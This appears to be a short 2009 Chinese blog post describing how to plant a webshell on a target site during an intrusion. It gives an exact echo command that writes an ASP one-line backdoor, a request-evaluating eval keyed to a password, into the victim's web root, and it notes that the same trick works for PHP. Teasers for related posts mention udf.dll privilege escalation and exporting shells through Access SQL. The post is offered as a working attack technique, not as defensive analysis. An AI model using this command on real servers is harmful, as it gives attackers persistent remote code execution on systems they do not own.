当前位置:首页 > 技术文章 > 正文内容

利用Echo 语句 巧拿webshell

lcy2009-10-02技术文章831

在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
命令格式
Echo 语句 >目标站绝对目录
例如:
echo ^<^%execute request("qing520")%^> >D:\www.hackqing.cn\wwwroot\hackqing.asp

这样访问目标站的目录下就会生成一个密码为qing520的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。

 

版权声明:本文由cy's Blog发布,如需转载请注明出处。

本文链接:https://www.c3389.com/post/38.html

相关文章

配置Windows Server 2008防火墙 - 允许被 Ping

配置Windows Server 2008防火墙 - 允许被 Ping

出于安全因素考虑,在 Windows Server 2008 上是不允许从外部对其执行 Ping 指令的,如果要配置允许被 Ping 通过以往的设置步骤会发现并不能从 Windows firewall...

解决ESXi时区不一致

解决ESXi时区不一致

一台时区(时间)正常的Linux服务器的localtime文件复制到ESXI服务器1wget https://github.com/bwcxyk/Figurebed/raw/master/esxi/l...

简单方法成为管理员过程

 实际操作中可以在webshell用udf.dll提权,用函数的上传文件功能上传文件到启动目录,再用shut函数重起系统.(目前没成功过,有机会本地测试一下,先记录在这了).如果是英文版的系...

IIS卸载后重装时提示:安装程序无法复制一个或多个文件 特定错误码是 0xe0000233

 网上找的解决办法都是说没有删除干净,不过服务里iisadmin也没有了。进程里也没有,是删除干净了。服务器重启还是不行,最终我的解决办法是:C:\Inetpub 权限给everyone完全...

access库利用后台SQL执行导出webshell渗透

黑白前线转载的。 今天渗透了一个站点,后台有能执行sql语句的地方,恰好又得到了网站物理路径。以前看到网上有用access导出shell的方法,原理大致和php网站的outfile差不多&n...

在 sys.servers 中找不到服务器的解决方法

出现错误: [Microsoft][ODBC SQL Server Driver][SQL Server]在 sys.servers 中找不到服务器 '***'。请验证指定的服务器名...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。